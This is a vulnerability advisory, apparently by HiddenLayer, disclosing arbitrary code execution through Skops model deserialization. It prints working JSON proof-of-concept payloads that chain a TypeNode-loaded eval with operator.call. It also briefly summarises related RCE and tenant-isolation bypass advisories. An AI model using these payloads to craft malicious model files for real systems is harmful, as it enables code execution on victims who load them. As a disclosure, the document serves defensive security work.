Model Deserialization Leads to Code Execution
June 4, 2024
Products Impacted
This vulnerability is present in Skops v0.6 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability breaks down into 2 main components, the ability to load arbitrary functions into memory, and the ability to call a function in the operator module. The first can be done by creating a node of type TypeNode and pulling in any function you want, such as the builtin eval function:
{
"__class__": "eval",
"__module__": "builtins",
"__loader__": "TypeNode",
"__id__": 1
}Because we can load functions into memory, if we are able to call them with the arguments that we want we can then exploit the loading system. This occurs in the compilation of a OperatorFuncNode node:
In Python 3.11 and later there is a function in the operator module called call which allows a user to call a function passed to it. This means that we need to create a model that grabs the call function and then passes in the eval function and the code we want to run:
{
"__class__": "call",
"__module__": "",
"__loader__": "OperatorFuncNode",
"attrs": {
"__class__": "tuple",
"__module__": "builtins",
"__loader__": "TupleNode",
"content": [
{
"__class__": "eval",
"__module__": "builtins",
"__loader__": "TypeNode",
"__id__": 1
},
{
"__class__": "str",
"__module__": "builtins",
"__loader__": "JsonNode",
"content": "\"print('pwned by Abraxus from HiddenLayer')\"",
"__id__": 5,
"is_json": true
}
],
"__id__": 8
},
"__id__": 0,
"protocol": 1,
"_skops_version": "0.10.dev0"
}When loaded with the trusted parameter set to True or setting the trusted types to all unknown types, this then executes the code and returns None. In the tutorial for how to use the library (scikit-learn documentation) both examples would allow for code execution:
However, for the security minded individuals out there, since in multiple parts of the codebase load and loads are called with trusted set to True inside of another function, users can still be exploited. One example of this is the update command line tool:
Project URL
https://github.com/skops-dev/skops
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer
Related SAI Security Advisory
June 12, 2026
Post-Authentication RCE via update_collection
Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.
June 12, 2026
V1 API Tenant Isolation Bypass via Null Tenant/Database Context
All V1 collection-level endpoints pass None for tenant and database to the authorization layer, making tenant-scoped access control impossible through V1, regardless of which authorization provider is configured. V1 cannot be disabled. Combined with CVE-2026-45830, any authenticated user has unrestricted read/write access to any collection by UUID through V1 endpoints.